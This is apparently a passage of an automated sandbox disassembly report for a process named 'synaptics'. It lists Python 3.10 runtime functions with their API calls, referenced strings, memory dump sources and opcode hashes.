                                                                                                                                                                                                      • API ID: Err_FormatMallocMem_Object_
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$@xJlr$D:\a\1\s\Objects\dictobject.c$VUUU$VUUU
                                                                                                                                                                                                      • API String ID: 2973548939-2270304975
                                                                                                                                                                                                      • Opcode ID: fde77960c4d2b3fd943f19a719dd7df6e52c6bf9dfc44bf59fcb67cf748071f1
                                                                                                                                                                                                      • Instruction ID: 71fe1fb4dcb5952f56c23ad11c3baa34790ca5bd192972c95d2ae4ca921cbb6f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fde77960c4d2b3fd943f19a719dd7df6e52c6bf9dfc44bf59fcb67cf748071f1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B51F6B27016018FDB24DE69D890FA6B7F5EB8532AB14813EE915CBB50DB30E445CBE0
                                                                                                                                                                                                      Function 6C576C30 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 148COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,?,-000000FF), ref: 6C576C80
                                                                                                                                                                                                      • _PyUnicode_EqualToASCIIString.PYTHON310(?,<frozen importlib._bootstrap>,-000000FF), ref: 6C576CB5
                                                                                                                                                                                                        • Part of subcall function 6C4E6510: _PyUnicode_Ready.PYTHON310(?), ref: 6C4E651E
                                                                                                                                                                                                        • Part of subcall function 6C4E6510: _PyErr_Clear.PYTHON310(?), ref: 6C4E6531
                                                                                                                                                                                                      • _PyUnicode_EqualToASCIIString.PYTHON310(?,<frozen importlib._bootstrap_external>,?,?,-000000FF), ref: 6C576CC9
                                                                                                                                                                                                      • _PyUnicode_EqualToASCIIString.PYTHON310(?,_call_with_frames_removed,?,?,-000000FF), ref: 6C576CFA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • _call_with_frames_removed, xrefs: 6C576CF2
                                                                                                                                                                                                      • Pntl, xrefs: 6C576D53
                                                                                                                                                                                                      • <frozen importlib._bootstrap>, xrefs: 6C576CA5
                                                                                                                                                                                                      • <frozen importlib._bootstrap_external>, xrefs: 6C576CC1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Unicode_$EqualString$ClearErr_ReadySubtypeType_
                                                                                                                                                                                                      • String ID: <frozen importlib._bootstrap>$<frozen importlib._bootstrap_external>$Pntl$_call_with_frames_removed
                                                                                                                                                                                                      • API String ID: 2835119365-2899678173
                                                                                                                                                                                                      • Opcode ID: 5d1d8b70066688518d0e707dfa48e87e552335a81cc89630fbe09346c28d98b1
                                                                                                                                                                                                      • Instruction ID: 3f44ff6aaaac34e4e99710f7c69489521c5189edd5834f21d377aab9a91f2070
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d1d8b70066688518d0e707dfa48e87e552335a81cc89630fbe09346c28d98b1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84515B759013059FCB50CF99DA81989BBF4FF08328F284269D924DBB91DB31ED91CBA0
                                                                                                                                                                                                      Function 6C58CBC0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 146timeCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,?), ref: 6C58CBE0
                                                                                                                                                                                                      • _PyLong_AsTime_t.PYTHON310(?), ref: 6C58CBED
                                                                                                                                                                                                        • Part of subcall function 6C58CA10: PyLong_AsLongLong.PYTHON310(?), ref: 6C58CA19
                                                                                                                                                                                                        • Part of subcall function 6C58CA10: PyErr_GivenExceptionMatches.PYTHON310(00000000,6C73BD78), ref: 6C58CA45
                                                                                                                                                                                                      • PyFloat_AsDouble.PYTHON310(?), ref: 6C58CC26
                                                                                                                                                                                                      • _isnan.API-MS-WIN-CRT-MATH-L1-1-0(?,?), ref: 6C58CC3B
                                                                                                                                                                                                      • modf.API-MS-WIN-CRT-MATH-L1-1-0(?,?), ref: 6C58CC79
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73BD78,00000000), ref: 6C58CD8C
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Invalid value NaN (not a number), xrefs: 6C58CC50
                                                                                                                                                                                                      • timestamp out of range for platform time_t, xrefs: 6C58CD6E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_LongLong_$DoubleExceptionFloat_GivenMatchesObjectSubtypeTime_tType__isnanmodf
                                                                                                                                                                                                      • String ID: Invalid value NaN (not a number)$timestamp out of range for platform time_t
                                                                                                                                                                                                      • API String ID: 2520283143-3572751444
                                                                                                                                                                                                      • Opcode ID: 3ec3bd855706a639c1da0ffb6be59f6b359b2ef54fac653e607b79a1cd90e56e
                                                                                                                                                                                                      • Instruction ID: 92a5ee2ebe5307bd98802ad9efebd44fb2e216e29bd94a59c4230afa1ca378c3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ec3bd855706a639c1da0ffb6be59f6b359b2ef54fac653e607b79a1cd90e56e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9151D831916F549BC302EF39D851917B7B8FF973A4F40576AF859AB640EB30E4818741
                                                                                                                                                                                                      Function 6C4D5AD0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 103COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,bad argument type for built-in operation), ref: 6C4D5AFA
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      • PyUnicode_FromString.PYTHON310(PyUnicode_AsEncodedUnicode() is deprecated; use PyCodec_Encode() to encode from str to str), ref: 6C4D5B16
                                                                                                                                                                                                      • PyCodec_Encode.PYTHON310(?,utf-8,?), ref: 6C4D5B82
                                                                                                                                                                                                      • PyErr_Format.PYTHON310('%.400s' encoder returned '%.400s' instead of 'str'; use codecs.encode() to encode to arbitrary types,utf-8,?), ref: 6C4D5BAF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • PyUnicode_AsEncodedUnicode() is deprecated; use PyCodec_Encode() to encode from str to str, xrefs: 6C4D5B11
                                                                                                                                                                                                      • bad argument type for built-in operation, xrefs: 6C4D5AEE
                                                                                                                                                                                                      • '%.400s' encoder returned '%.400s' instead of 'str'; use codecs.encode() to encode to arbitrary types, xrefs: 6C4D5BA4
                                                                                                                                                                                                      • utf-8, xrefs: 6C4D5B73, 6C4D5B80, 6C4D5BA3
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$String$Codec_EncodeFormatFromObjectUnicode_
                                                                                                                                                                                                      • String ID: '%.400s' encoder returned '%.400s' instead of 'str'; use codecs.encode() to encode to arbitrary types$PyUnicode_AsEncodedUnicode() is deprecated; use PyCodec_Encode() to encode from str to str$bad argument type for built-in operation$utf-8
                                                                                                                                                                                                      • API String ID: 2461656271-2917124143
                                                                                                                                                                                                      • Opcode ID: c24ff33205741f83c822d7706b862dd2ec3d5cf11142c66ba736061a2ab5875d
                                                                                                                                                                                                      • Instruction ID: 2dc8ce55eac1346c9e47d90ec2344847c670e05a8017dd79481c561a08d00ddb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c24ff33205741f83c822d7706b862dd2ec3d5cf11142c66ba736061a2ab5875d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C31E7B27002009BC710EEA9EC41E86B7E4EB9523AF060325FD2CC7B91DB61EC11D791
                                                                                                                                                                                                      Function 6C565D70 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_NormalizeException.PYTHON310(?,00000000,00000000,?), ref: 6C565DE1
                                                                                                                                                                                                      • PyException_SetTraceback.PYTHON310(00000000,00000000,?,?,?), ref: 6C565DF4
                                                                                                                                                                                                        • Part of subcall function 6C47A450: _PyErr_SetString.PYTHON310(00000000,6C73BFE8,__traceback__ may not be deleted), ref: 6C47A478
                                                                                                                                                                                                      • _PyErr_NormalizeException.PYTHON310(?,00000000,6C4AA056,00000000,?,?,?), ref: 6C565E2E
                                                                                                                                                                                                      • PyException_SetContext.PYTHON310(6C4AA056,00000000,?,00000000,6C4AA056,00000000,?,?,?), ref: 6C565E3A
                                                                                                                                                                                                      • _PyErr_Restore.PYTHON310(?,00000000,6C4AA056,00000000,6C4AA056,00000000,?,00000000,6C4AA056,00000000,?,?,?), ref: 6C565E47
                                                                                                                                                                                                      • _PyErr_Restore.PYTHON310(?,00000000,00000000,?), ref: 6C565E5D
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,_PyErr_ChainExceptions: exception %R is not a BaseException subclass,00000000), ref: 6C565E78
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • _PyErr_ChainExceptions: exception %R is not a BaseException subclass, xrefs: 6C565E6C
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$ExceptionException_NormalizeRestore$ContextFormatStringTraceback
                                                                                                                                                                                                      • String ID: _PyErr_ChainExceptions: exception %R is not a BaseException subclass
                                                                                                                                                                                                      • API String ID: 928410069-3270846945
                                                                                                                                                                                                      • Opcode ID: 85971a3235c0b5c16b51e0fc948cb01e8e607cac771ecae1726eff52ea728f50
                                                                                                                                                                                                      • Instruction ID: 1da25a61b03009bce77f851f53fdae7ccf92a763d5d0ee99839b4b85ceb1dd56
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85971a3235c0b5c16b51e0fc948cb01e8e607cac771ecae1726eff52ea728f50
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C431AF76901108BBCB00CF99DD40EDA77B8FF45228F50429AFC1897A61E732EA65CBD1
                                                                                                                                                                                                      Function 6C58BFC0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 821dbcf71616597d12eb139f3f620622bb8da2c958b4f2edd6f75d00997d3df1
                                                                                                                                                                                                      • Instruction ID: d8833ce3893da9b91e7cd56480bd1c34b76477dce923b5492e03c2dc70ec0b1f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 821dbcf71616597d12eb139f3f620622bb8da2c958b4f2edd6f75d00997d3df1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14314FB15053019FE700DF64CD84B9BB7E8BF88748F04462EF95597651EB30EA09CBA2
                                                                                                                                                                                                      Function 6C5B0E80 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74E118), ref: 6C5B0EC6
                                                                                                                                                                                                      • PyObject_VectorcallMethod.PYTHON310(00000000,/Zl,80000001,00000000,6C5AED2F), ref: 6C5B0EDE
                                                                                                                                                                                                        • Part of subcall function 6C468650: _PyObject_GetMethod.PYTHON310(?,80000001,00000000,?,?,6C74BC20,?,?,6C45283A,00000000,?,80000001), ref: 6C468670
                                                                                                                                                                                                      • _PyErr_Clear.PYTHON310(?,6C5AED2F), ref: 6C5B0F02
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74E118), ref: 6C5B0F26
                                                                                                                                                                                                      • PyObject_VectorcallMethod.PYTHON310(00000000,/Zl,80000001,00000000,6C5AED2F), ref: 6C5B0F3E
                                                                                                                                                                                                      • _PyErr_Clear.PYTHON310(?,6C5AED2F), ref: 6C5B0F62
                                                                                                                                                                                                      • _PyErr_Restore.PYTHON310(?,?,?,?), ref: 6C5B0F73
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_MethodObject_$ClearFromUnicode_Vectorcall$Restore
                                                                                                                                                                                                      • String ID: /Zl
                                                                                                                                                                                                      • API String ID: 1004897303-1635511660
                                                                                                                                                                                                      • Opcode ID: a0b26788c5e21f5b25a759ee0033497afcc90964a4a6fdea0a69dc810638a5f5
                                                                                                                                                                                                      • Instruction ID: 82bc363ebeb174accc427eb7a00fd3e9782e85d4957d26d089afe067fa4f04ed
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0b26788c5e21f5b25a759ee0033497afcc90964a4a6fdea0a69dc810638a5f5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 202127F0B01209AFEB00CB65CE65E973B68DB81368F104868E915A7F91E731EC05C7E1
                                                                                                                                                                                                      Function 73A8AA32 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: NameName::Name::operator+shared_ptr
                                                                                                                                                                                                      • String ID: char $int $long $short $unsigned
                                                                                                                                                                                                      • API String ID: 3919194733-3894466517
                                                                                                                                                                                                      • Opcode ID: f0583dbb33f1240caddfbbb06fcd7b845cf5b00671ccf2bfcba6dc9ce07b8ed9
                                                                                                                                                                                                      • Instruction ID: d2e5877a138b7928dbb333b9684e1c2e99ae5df34e36fd7e8d11516227a597ca
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0583dbb33f1240caddfbbb06fcd7b845cf5b00671ccf2bfcba6dc9ce07b8ed9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D23139B1900249DFCB06CFA8C546BEEBBB4FB09304F04859BE516AB399DB709A05CF54
                                                                                                                                                                                                      Function 6C580A10 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyMem_Malloc.PYTHON310(00000028,?,?,?,6C580BCE), ref: 6C580A25
                                                                                                                                                                                                      • PyMem_Malloc.PYTHON310(00000040,6C580BCE), ref: 6C580A42
                                                                                                                                                                                                      • PyMem_Free.PYTHON310(00000000,?,6C580BCE), ref: 6C580A52
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73C4C8,00000000,6C580BCE), ref: 6C580A76
                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000040,?,6C580BCE), ref: 6C580A8C
                                                                                                                                                                                                      • _Py_FatalErrorFunc.PYTHON310(_PyErr_NoMemory,Out of memory and PyExc_MemoryError is not initialized yet,6C580BCE), ref: 6C580ADA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Out of memory and PyExc_MemoryError is not initialized yet, xrefs: 6C580AD0
                                                                                                                                                                                                      • _PyErr_NoMemory, xrefs: 6C580AD5
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Mem_$Malloc$Err_ErrorFatalFreeFuncObjectmemset
                                                                                                                                                                                                      • String ID: Out of memory and PyExc_MemoryError is not initialized yet$_PyErr_NoMemory
                                                                                                                                                                                                      • API String ID: 1289846250-4272006360
                                                                                                                                                                                                      • Opcode ID: 193f625b36dd91f67ce6ebceae924c297ef163d4cf1418178b88071d6d0d7153
                                                                                                                                                                                                      • Instruction ID: 37176b7bf073efdd91d39f042b17dd65bc7248d8027de9245696c0ec1c902280
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 193f625b36dd91f67ce6ebceae924c297ef163d4cf1418178b88071d6d0d7153
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC112CF16137109BE220CF59AC02B8377E4AB90328F10461EE5598BF90E774E5458BD1
                                                                                                                                                                                                      Function 6C58FE50 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 21COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,6C4A26A6,?,?,?,?,?), ref: 6C58FE56
                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,6C4A26A6,?,?,?,?,?), ref: 6C58FE64
                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,6C4A26A6,?,?,?,?,?), ref: 6C58FE6D
                                                                                                                                                                                                      • _Py_FatalErrorFunc.PYTHON310(PyGILState_Release,auto-releasing thread-state, but no thread-state for this thread,?,?,6C4A26A6,?,?,?,?,?), ref: 6C58FEB7
